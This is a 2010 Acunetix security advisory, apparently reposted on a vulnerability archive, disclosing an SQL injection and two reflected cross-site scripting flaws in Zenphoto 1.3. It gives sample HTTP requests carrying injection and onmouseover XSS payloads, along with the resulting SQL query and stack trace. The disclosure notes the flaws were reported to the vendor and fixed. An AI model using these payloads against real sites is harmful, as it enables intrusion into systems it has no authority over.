Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24709
HistorySep 12, 2010 - 12:00 a.m.

Security problems in Zenphoto version 1.3

2010-09-1200:00:00
vulners.com
78

We are continuing with the list of security vulnerabilities found in a
number of web applications while testing our latest version of Acunetix
WVS v7 . In this blog post, we will look into the details of a number
of security problems discovered by Acunetix WVS in the popular web
gallery application Zenphoto.

Zenphoto is a standalone gallery CMS that just makes sense and

doesn’t try to do everything and your dishes. We hope you agree with our
philosophy: simpler is better. Don’t get us wrong though – Zenphoto
really does have everything you need for web media gallery management.

The following web vulnerabilities were found in Zenphoto Version 1.3;

  1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”.
  2. Cross-site Scripting vulnerability in
    “/zenphoto_1_3/zp-core/admin.php”, parameter “from”.
    3.Cross-site Scripting vulnerability in
    “/zenphoto_1_3/zp-core/admin.php”, parameter “user”.

Technical details about each web vulnerability are below;

  1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”.

Source file: /var/www/zenphoto_1_3/zp-core/functions-db.php line: 65

Additional details:

SQL Query:
SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE
"1ACUSTART'"" OR `folder` LIKE "1ACUSTART'"/
ACUEND"

Stack trace:

  1. query([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE
    `folder` LIKE "1ACUSTART'"" OR `folder` LIKE "1ACUSTART'"/\n
    ACUEND"", [boolean] false)
  2. query_full_array([string] "SELECT `id`, `album_theme` FROM
    `zp_albums` WHERE `folder` LIKE "1ACUSTART'"" OR `folder` LIKE
    "1ACUSTART'"
    /\n ACUEND"")
  3. getAlbumInherited([string] "1ACUSTART'"*/\n ACUEND", [string]
    "album_theme", [NULL] )
  4. themeSetup([string] "1ACUSTART'"*/\n ACUEND")

As you can see in the SQL query (or the stack trace), in order to alter
the SQL statement sent to the database you need to use a double qoute
(not a single one, as in most SQL injections).

Sample HTTP request:
GET
/zenphoto_1_3/zp-core/full-image.php?a=%24%7binjecthere%7d&i=system-bug.jpg&q=75
HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)

  1. Cross-site Scripting vulnerability in
    “/zenphoto_1_3/zp-core/admin.php”, parameter “from”.

Attack details

URL encoded GET input from was set to ” onmouseover=prompt(934419) bad=”.
The input is reflected inside a tag element between double quotes.

Sample HTTP request:
GET
/zenphoto_1_3/zp-core/admin.php?from=%22%20onmouseover%3dprompt%28934419%29%20bad%3d%22
HTTP/1.1
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)

  1. Cross-site Scripting vulnerability in
    “/zenphoto_1_3/zp-core/admin.php”, parameter “user”.

Attack details

URL encoded POST input user was set to ” onmouseover=prompt(932890) bad=”.
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:
POST /zenphoto_1_3/zp-core/admin.php HTTP/1.1
Content-Length: 149
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)

code_h=1644ca84b35bf7663c5e828744339de8&login=1&pass=acUn3t1x&redirect=%2fzp-core%2fadmin.php&user=%22%20onmouseover%3dprompt%28932890%29%20bad%3d%22

These vulnerabilities were reported to the Zenphoto team on 22/7/2010
via the trac system on their website and they were fixed in latest
version of Zenphoto. If you are using Zenphoto, download the latest
version from their website.

Bogdan Calin - bogdan [at] acunetix.com
CTO
Acunetix Ltd. - http://www.acunetix.com
Acunetix Web Security Blog - http://www.acunetix.com/blog
Follow us on Twitter - http://www.twitter.com/acunetix